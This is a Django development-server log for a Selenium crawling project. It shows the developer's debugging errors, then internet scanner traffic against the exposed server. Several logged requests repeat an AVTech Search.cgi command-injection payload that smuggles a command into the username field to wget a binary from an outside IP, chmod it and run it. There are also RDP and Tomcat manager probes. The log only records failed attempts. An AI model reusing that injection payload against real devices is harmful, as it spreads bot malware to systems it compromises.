  File "manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
Unknown command: 'runserver8000'. Did you mean runserver?
Type 'manage.py help' for usage.
Not Found: /crawling/tagnum/pictures/3
[11/Oct/2018 08:39:01] "GET /crawling/tagnum/pictures/3 HTTP/1.1" 404 2302
Not Found: /favicon.ico
[11/Oct/2018 08:39:01] "GET /favicon.ico HTTP/1.1" 404 2257
Not Found: /crawling/tagnum/3
[11/Oct/2018 08:39:11] "GET /crawling/tagnum/3 HTTP/1.1" 404 2275
Not Found: /favicon.ico
[11/Oct/2018 08:39:11] "GET /favicon.ico HTTP/1.1" 404 2257
Performing system checks...

System check identified no issues (0 silenced).
October 11, 2018 - 08:38:09
Django version 2.1.2, using settings 'pospot.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
Internal Server Error: /crawling/tagnum/3
Traceback (most recent call last):
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 126, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 124, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "/home/pospot/pospot/crawling/views.py", line 8, in tagnum
    driver = webdriver.Chrome('chrome/chromedriver')
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/selenium/webdriver/chrome/webdriver.py", line 73, in __init__
    self.service.start()
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/selenium/webdriver/common/service.py", line 76, in start
    stdin=PIPE)
  File "/usr/lib/python3.6/subprocess.py", line 709, in __init__
    restore_signals, start_new_session)
  File "/usr/lib/python3.6/subprocess.py", line 1344, in _execute_child
    raise child_exception_type(errno_num, err_msg, err_filename)
OSError: [Errno 8] Exec format error: 'chrome/chromedriver'
[11/Oct/2018 08:39:52] "GET /crawling/tagnum/3 HTTP/1.1" 500 101170
Internal Server Error: /crawling/tagnum/
Traceback (most recent call last):
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 126, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 124, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "/home/pospot/pospot/crawling/views.py", line 8, in tagnum
    driver = webdriver.Chrome('chrome/chromedriver')
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/selenium/webdriver/chrome/webdriver.py", line 73, in __init__
    self.service.start()
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/selenium/webdriver/common/service.py", line 76, in start
    stdin=PIPE)
  File "/usr/lib/python3.6/subprocess.py", line 709, in __init__
    restore_signals, start_new_session)
  File "/usr/lib/python3.6/subprocess.py", line 1344, in _execute_child
    raise child_exception_type(errno_num, err_msg, err_filename)
OSError: [Errno 8] Exec format error: 'chrome/chromedriver'
[11/Oct/2018 08:40:18] "GET /crawling/tagnum/ HTTP/1.1" 500 101159
Internal Server Error: /crawling/pictures
Traceback (most recent call last):
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 126, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 124, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
TypeError: tagnum() missing 1 required positional argument: 'pk'
[11/Oct/2018 08:40:19] "GET /crawling/pictures HTTP/1.1" 500 59487
Internal Server Error: /crawling/pictures
Traceback (most recent call last):
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 126, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 124, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
TypeError: tagnum() missing 1 required positional argument: 'pk'
[11/Oct/2018 08:40:24] "GET /crawling/pictures HTTP/1.1" 500 59487
Internal Server Error: /crawling/pictures
Traceback (most recent call last):
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 126, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 124, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
TypeError: tagnum() missing 1 required positional argument: 'pk'
[11/Oct/2018 08:40:25] "GET /crawling/pictures HTTP/1.1" 500 59487
Internal Server Error: /crawling/pictures/3
Traceback (most recent call last):
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 126, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 124, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
TypeError: tagnum() missing 1 required positional argument: 'pk'
[11/Oct/2018 08:40:36] "GET /crawling/pictures/3 HTTP/1.1" 500 59507
Not Found: /favicon.ico
[11/Oct/2018 08:40:37] "GET /favicon.ico HTTP/1.1" 404 2256
Internal Server Error: /crawling/pictures/3
Traceback (most recent call last):
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 126, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 124, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
TypeError: tagnum() missing 1 required positional argument: 'pk'
[11/Oct/2018 08:41:33] "GET /crawling/pictures/3 HTTP/1.1" 500 59507
Performing system checks...

System check identified no issues (0 silenced).
October 11, 2018 - 08:39:49
Django version 2.1.2, using settings 'pospot.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
Performing system checks...

System check identified no issues (0 silenced).
October 11, 2018 - 08:42:21
Django version 2.1.2, using settings 'pospot.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
Traceback (most recent call last):
  File "manage.py", line 8, in <module>
    from django.core.management import execute_from_command_line
ModuleNotFoundError: No module named 'django'

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "manage.py", line 14, in <module>
    ) from exc
ImportError: Couldn't import Django. Are you sure it's installed and available on your PYTHONPATH environment variable? Did you forget to activate a virtual environment?
Traceback (most recent call last):
  File "manage.py", line 8, in <module>
    from django.core.management import execute_from_command_line
ModuleNotFoundError: No module named 'django'

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "manage.py", line 14, in <module>
    ) from exc
ImportError: Couldn't import Django. Are you sure it's installed and available on your PYTHONPATH environment variable? Did you forget to activate a virtual environment?
Internal Server Error: /crawling/pictures
Traceback (most recent call last):
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 126, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 124, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
TypeError: tagnum() missing 1 required positional argument: 'pk'
[11/Oct/2018 09:25:18] "GET /crawling/pictures HTTP/1.1" 500 60829
Not Found: /favicon.ico
[11/Oct/2018 09:25:18] "GET /favicon.ico HTTP/1.1" 404 2256
Performing system checks...

System check identified no issues (0 silenced).
October 11, 2018 - 09:24:38
Django version 2.1.2, using settings 'pospot.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
Internal Server Error: /crawling/pictures
Traceback (most recent call last):
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 126, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 124, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
TypeError: tagnum() missing 1 required positional argument: 'pk'
[11/Oct/2018 09:27:31] "GET /crawling/pictures HTTP/1.1" 500 60964
Performing system checks...

System check identified no issues (0 silenced).
October 11, 2018 - 09:26:29
Django version 2.1.2, using settings 'pospot.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
Performing system checks...

System check identified no issues (0 silenced).
October 11, 2018 - 09:27:40
Django version 2.1.2, using settings 'pospot.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
Performing system checks...

System check identified no issues (0 silenced).
October 11, 2018 - 09:27:58
Django version 2.1.2, using settings 'pospot.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
[11/Oct/2018 09:28:28] "GET /crawling/pictures HTTP/1.1" 200 18
Internal Server Error: /crawling/tagnum/3
Traceback (most recent call last):
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 126, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 124, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "/home/pospot/pospot/crawling/views.py", line 9, in tagnum
    driver = webdriver.Chrome(os.getcwd(),timeout)
NameError: name 'timeout' is not defined
[11/Oct/2018 09:28:33] "GET /crawling/tagnum/3 HTTP/1.1" 500 64508
Performing system checks...

System check identified no issues (0 silenced).
October 11, 2018 - 09:28:26
Django version 2.1.2, using settings 'pospot.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
Unhandled exception in thread started by <function check_errors.<locals>.wrapper at 0x7f96aec1a158>
Traceback (most recent call last):
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/utils/autoreload.py", line 225, in wrapper
    fn(*args, **kwargs)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 117, in inner_run
    self.check(display_num_errors=True)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/management/base.py", line 379, in check
    include_deployment_checks=include_deployment_checks,
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/management/base.py", line 366, in _run_checks
    return checks.run_checks(**kwargs)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/checks/registry.py", line 71, in run_checks
    new_errors = check(app_configs=app_configs)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/checks/urls.py", line 13, in check_url_config
    return check_resolver(resolver)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/checks/urls.py", line 23, in check_resolver
    return check_method()
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/urls/resolvers.py", line 396, in check
    for pattern in self.url_patterns:
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/utils/functional.py", line 37, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/urls/resolvers.py", line 533, in url_patterns
    patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/utils/functional.py", line 37, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/urls/resolvers.py", line 526, in urlconf_module
    return import_module(self.urlconf_name)
  File "/home/pospot/Env/pospot/lib/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/pospot/pospot/pospot/urls.py", line 19, in <module>
    from crawling import views
  File "/home/pospot/pospot/crawling/views.py", line 10
    driver.set_page_load_timeout(my_timeout_secs)
         ^
SyntaxError: invalid syntax
Performing system checks...

[11/Oct/2018 09:29:54] "GET /crawling/pictures HTTP/1.1" 200 18
Internal Server Error: /crawling/tagnum/3
Traceback (most recent call last):
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/selenium/webdriver/common/service.py", line 76, in start
    stdin=PIPE)
  File "/usr/lib/python3.6/subprocess.py", line 709, in __init__
    restore_signals, start_new_session)
  File "/usr/lib/python3.6/subprocess.py", line 1344, in _execute_child
    raise child_exception_type(errno_num, err_msg, err_filename)
PermissionError: [Errno 13] Permission denied: '/home/pospot/pospot'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 126, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/handlers/base.py", line 124, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "/home/pospot/pospot/crawling/views.py", line 9, in tagnum
    driver = webdriver.Chrome(os.getcwd())
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/selenium/webdriver/chrome/webdriver.py", line 73, in __init__
    self.service.start()
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/selenium/webdriver/common/service.py", line 88, in start
    os.path.basename(self.path), self.start_error_message)
selenium.common.exceptions.WebDriverException: Message: 'pospot' executable may have wrong permissions. Please see https://sites.google.com/a/chromium.org/chromedriver/home

[11/Oct/2018 09:29:59] "GET /crawling/tagnum/3 HTTP/1.1" 500 108983
Not Found: /status
[11/Oct/2018 23:47:50] "GET /status HTTP/1.1" 404 2241
Not Found: /
[12/Oct/2018 01:50:49] "GET / HTTP/1.1" 404 2205
Not Found: /favicon.ico
[12/Oct/2018 01:50:59] "GET /favicon.ico HTTP/1.1" 404 2256
Not Found: /favicon.ico
[12/Oct/2018 02:28:38] "GET /favicon.ico HTTP/1.1" 404 2256
Not Found: /
[12/Oct/2018 06:26:07] "GET / HTTP/1.0" 404 2202
Not Found: /
[12/Oct/2018 07:23:47] "GET / HTTP/1.1" 404 2200
[12/Oct/2018 14:31:35] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[12/Oct/2018 14:31:35] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /
[12/Oct/2018 15:14:29] "GET / HTTP/1.1" 404 2205
[12/Oct/2018 17:37:34] code 400, message Bad request syntax ('\x00\x00\x00TZ\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x04\x010I\x00\x00\x00\x00\x80\x0b¨À\x00\x0c)t F\x07\x00tsXrcsXYs9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00bbXcsXctst\x00\x00\x00\x00\x00\x00')
[12/Oct/2018 17:37:34] "   TZ          0I    ¨À )t F tsXrcsXYs9                      bbXcsXctst      " 400 -
Not Found: /
[12/Oct/2018 18:52:26] "GET / HTTP/1.1" 404 2205
Not Found: /status
[12/Oct/2018 19:33:36] "GET /status HTTP/1.1" 404 2241
Not Found: /
[13/Oct/2018 01:53:17] "GET / HTTP/1.1" 404 2205
Not Found: /favicon.ico
[13/Oct/2018 01:53:23] "GET /favicon.ico HTTP/1.1" 404 2256
Not Found: /status
[13/Oct/2018 22:07:43] "GET /status HTTP/1.1" 404 2241
[14/Oct/2018 04:54:49] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[14/Oct/2018 04:54:49] "  /*à     Cookie: mstshash=Administr" 400 -
[14/Oct/2018 05:11:25] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[14/Oct/2018 05:11:25] "  /*à     Cookie: mstshash=Administr" 400 -
[14/Oct/2018 05:22:08] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[14/Oct/2018 05:22:08] "  /*à     Cookie: mstshash=Administr" 400 -
Performing system checks...

System check identified no issues (0 silenced).
October 11, 2018 - 09:29:50
Django version 2.1.2, using settings 'pospot.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
Performing system checks...

System check identified no issues (0 silenced).
October 14, 2018 - 11:01:09
Django version 2.1.2, using settings 'pospot.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
Unhandled exception in thread started by <function check_errors.<locals>.wrapper at 0x7fdb06fc0950>
Traceback (most recent call last):
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/apps/config.py", line 118, in create
    cls = getattr(mod, cls_name)
AttributeError: module 'django' has no attribute 'crontab'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/utils/autoreload.py", line 225, in wrapper
    fn(*args, **kwargs)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 109, in inner_run
    autoreload.raise_last_exception()
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/utils/autoreload.py", line 248, in raise_last_exception
    raise _exception[1]
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/core/management/__init__.py", line 337, in execute
    autoreload.check_errors(django.setup)()
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/utils/autoreload.py", line 225, in wrapper
    fn(*args, **kwargs)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/__init__.py", line 24, in setup
    apps.populate(settings.INSTALLED_APPS)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/apps/registry.py", line 89, in populate
    app_config = AppConfig.create(entry)
  File "/home/pospot/Env/pospot/lib/python3.6/site-packages/django/apps/config.py", line 123, in create
    import_module(entry)
  File "/home/pospot/Env/pospot/lib/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'django.crontab'
Performing system checks...

System check identified no issues (0 silenced).
October 14, 2018 - 11:06:32
Django version 2.1.2, using settings 'pospot.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
Not Found: /
[15/Oct/2018 02:01:35] "GET / HTTP/1.0" 404 2202
[15/Oct/2018 10:58:31] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00+&à\x00\x00\x00\x00\x00Cookie:')
[15/Oct/2018 10:58:31] "  +&à     Cookie: mstshash=hello" 400 -
Not Found: /
[15/Oct/2018 19:43:55] "GET / HTTP/1.1" 404 2205
Not Found: /cgi-bin/nobody/Search.cgi
[16/Oct/2018 06:39:12] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 404 2540
Not Found: /cgi-bin/nobody/Search.cgi
[16/Oct/2018 07:20:27] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 404 2540
Not Found: /cgi-bin/nobody/Search.cgi
[16/Oct/2018 09:39:32] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 404 2540
Not Found: /cgi-bin/nobody/Search.cgi
[16/Oct/2018 09:39:35] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 404 2540
Not Found: /cgi-bin/nobody/Search.cgi
[16/Oct/2018 09:39:35] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 404 2540
Not Found: /cgi-bin/nobody/Search.cgi
[16/Oct/2018 09:39:40] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 404 2540
[16/Oct/2018 09:48:26] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00+&à\x00\x00\x00\x00\x00Cookie:')
[16/Oct/2018 09:48:26] "  +&à     Cookie: mstshash=hello" 400 -
Not Found: /verifylogin.do
[16/Oct/2018 16:18:59] "GET /verifylogin.do HTTP/1.1" 404 2265
Not Found: /invoker/readonly
[16/Oct/2018 16:18:59] "GET /invoker/readonly HTTP/1.1" 404 2271
Not Found: /indexweb4.jsp/
[16/Oct/2018 16:19:07] "PUT /indexweb4.jsp/ HTTP/1.1" 404 2265
Not Found: /
[16/Oct/2018 16:19:07] "GET / HTTP/1.1" 404 2205
Not Found: /
[16/Oct/2018 21:04:09] "GET / HTTP/1.1" 404 2205
Not Found: /cgi-bin/nobody/Search.cgi
[17/Oct/2018 01:13:21] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 404 2540
Not Found: /cgi-bin/nobody/Search.cgi
[17/Oct/2018 01:13:22] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 404 2540
Not Found: /cgi-bin/nobody/Search.cgi
[17/Oct/2018 01:13:24] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 404 2540
Not Found: /status
[17/Oct/2018 01:40:36] "GET /status HTTP/1.1" 404 2241
Not Found: /
[17/Oct/2018 02:40:13] "GET / HTTP/1.0" 404 2202
Not Found: /
[17/Oct/2018 07:56:39] "GET / HTTP/1.0" 404 2202
Not Found: /
[17/Oct/2018 07:56:40] "GET / HTTP/1.0" 404 2202
Not Found: /
[17/Oct/2018 07:56:42] "GET / HTTP/1.0" 404 2202
Not Found: /
[17/Oct/2018 07:56:46] "GET / HTTP/1.0" 404 2202
Not Found: /
[17/Oct/2018 07:56:54] "GET / HTTP/1.0" 404 2202
Not Found: /cgi-bin/nobody/Search.cgi
[17/Oct/2018 12:40:51] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 404 2540
Not Found: /cgi-bin/nobody/Search.cgi
[17/Oct/2018 17:18:58] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 404 2540
Not Found: /
[17/Oct/2018 21:52:40] "GET / HTTP/1.1" 404 2205
Not Found: /
[17/Oct/2018 22:28:51] "GET / HTTP/1.1" 404 2205
Not Found: /cgi-bin/nobody/Search.cgi
[18/Oct/2018 06:23:40] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 404 2540
Not Found: /cgi-bin/nobody/Search.cgi
[18/Oct/2018 11:33:40] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 404 2540
Not Found: /cgi-bin/nobody/Search.cgi
[18/Oct/2018 12:07:45] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 404 2540
Not Found: /
[19/Oct/2018 00:23:43] "GET / HTTP/1.1" 404 2205
Not Found: /
[19/Oct/2018 01:24:16] "GET / HTTP/1.0" 404 2202
Not Found: /
[19/Oct/2018 01:54:10] "GET / HTTP/1.0" 404 2202
Not Found: /cgi-bin/nobody/Search.cgi
[19/Oct/2018 09:35:19] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 404 2540
Not Found: /
[20/Oct/2018 08:42:20] "GET / HTTP/1.1" 404 2205
Not Found: /manager/html
[20/Oct/2018 13:15:09] "GET /manager/html HTTP/1.1" 404 2259
[20/Oct/2018 13:15:09] code 400, message Bad request syntax ("\x16\x03\x01\x00H\x01\x00\x00D\x03\x01[Ë*]AÈfqÀ\x87à'díð\x89§ÑQ¦\x9e5\x04Ø5é¹µå1Vî\x00\x00\x16\x00\x04\x00\x05\x00")
[20/Oct/2018 13:15:09] You're accessing the development server over HTTPS, but it only supports HTTP.

[20/Oct/2018 13:15:09] code 400, message Bad request syntax ('\x16\x03\x01\x00H\x01\x00\x00D\x03\x01[Ë*]A0Ì¬§,HÐí¨\x95m»ù~ª/\x08\x7f[\x8eYû×v+fÈ\x00\x00\x16\x00\x04\x00\x05\x00')
[20/Oct/2018 13:15:09] You're accessing the development server over HTTPS, but it only supports HTTP.

Not Found: /
[20/Oct/2018 13:26:39] "GET / HTTP/1.0" 404 2202
[21/Oct/2018 08:54:17] code 400, message Bad request syntax ('\x00\x00\x00TZ\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x04\x010I\x00\x00\x00\x00\x80\x0b¨À\x00\x0c)t F\x07\x00tsXrcsXYs9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00bbXcsXctst\x00\x00\x00\x00\x00\x00')
[21/Oct/2018 08:54:17] "   TZ          0I    ¨À )t F tsXrcsXYs9                      bbXcsXctst      " 400 -
Not Found: /
[21/Oct/2018 15:03:40] "GET / HTTP/1.1" 404 2205
Not Found: /
[21/Oct/2018 19:24:33] "GET / HTTP/1.1" 404 2205
Not Found: /
[21/Oct/2018 19:35:26] "GET / HTTP/1.0" 404 2202
Not Found: /
